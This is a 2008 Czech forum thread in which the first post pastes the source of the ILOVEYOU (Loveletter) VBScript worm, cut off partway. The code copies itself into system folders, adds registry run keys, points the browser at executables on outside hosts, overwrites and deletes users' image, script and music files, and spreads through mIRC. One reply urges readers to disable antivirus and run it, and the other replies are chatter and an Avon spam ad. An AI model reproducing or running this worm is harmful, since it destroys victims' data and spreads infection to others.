Diskuze a otázky - I Love You

úvodní strana | aktualizovat | dolů

uživatel eliminován | 7. 07. 2008, 18:34:07 |

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scr

reagovat

V diskuzi je 17 příspěvků a shlédlo ji 1419 uživatelů .

Pro přidání komentáře musíš být přihlášen(a).

uživatel eliminován | 7. 07. 2008, 19:12:10

tojo!!

uživatel eliminován | 7. 07. 2008, 19:10:23

vypni si antivir napis tohle do .vbs skriptu a uvidis!2!

uživatel eliminován | 7. 07. 2008, 19:09:43

nic moc jenom mazal data v pameti takze nic vaznyho!5!

uživatel eliminován | 7. 07. 2008, 18:57:50

acha !2! to je myslím trošku starší virus, co vlastně prováděl?

uživatel eliminován | 7. 07. 2008, 18:54:37

to neni pokus podle me programovat umi jenom nam sem hodil zdrojak viru i love you

uživatel eliminován | 7. 07. 2008, 18:51:40

pokus o programován?

Kitty.Gab

Kitty.Gab | 7. 07. 2008, 18:44:11 | více příspěvků | napsat uživateli

Jo, traky si myslím.. :D:D

uživatel eliminován | 7. 07. 2008, 18:42:40

jestli se ten kluk vyzna v tom co tady opsal nevim odkud tak doktora nepotrebuje vubec a rek bych ze ma vic inteligence nez kdokoliv tady z nas

uživatel eliminován | 7. 07. 2008, 18:41:13

a co na to doktor??

uživatel eliminován | 7. 07. 2008, 18:40:26

halooo kodere asi nereaguje kuwa ci co:(

uživatel eliminován | 7. 07. 2008, 18:39:06

WOW...to joo :D

uživatel eliminován | 7. 07. 2008, 18:38:00

Dobrý den.
Nabízím Vám práci v celosvětové kosmetické firmě Avon.
Ráda bych Vám nabídla spolupráci s touto skvělou kosmetikou a možnost,jak tuto kosmetiku mít pro sebe se slevou,tak dostat skvělé dárky a mít z objednávky provizi.
Začala nám kampaň 10 a pokud by jste měli objednávku nad 1999,- jako dárek by Vám byl zdarma poslán make-up,řasenka a katalog zdarma.
Budu ráda,když se připojíte k našemu týmu.
Ozvětě se mi buď na e-mail: Dory.Verunka@seznam.cz nebo telefon:773 178 100.

uživatel eliminován | 7. 07. 2008, 18:37:30

ty woe koder vitej synu a zdrojak mellissy bys nemel???!54!!54!!54!

uživatel eliminován | 7. 07. 2008, 18:36:33

fakt? tak jo !1366!

uživatel eliminován | 7. 07. 2008, 18:36:30

drogy nebereš ?

uživatel eliminován | 7. 07. 2008, 18:35:51

no jasne !1277!

uživatel eliminován | 7. 07. 2008, 18:35:51

Zatím nikdo nereagoval, buď první!


Přihlášení
 
@libimseti.cz

registrovat se

Klíčová slova

setwscrfiléfsocreateobjectvbscopynextremwscriptresumémainctrerrorhkey_current_usermicrosofhaťopentextfilebarokregreadgroupscriptfullnamelovmanilamailyoudirsystemreadallshellispyderdowdirtempdirwinloveletterfilesystemobjectschoolvbephilippinesgrammersoftcomspyderscriptingsoftware

Podobná témata

Moje témata

Pro zobrazení tvých diskuzí se musíš přihlásit.

Oblíbená témata

Pro zobrazení tvých oblíbených témat se musíš přihlásit.

k obsahu ↑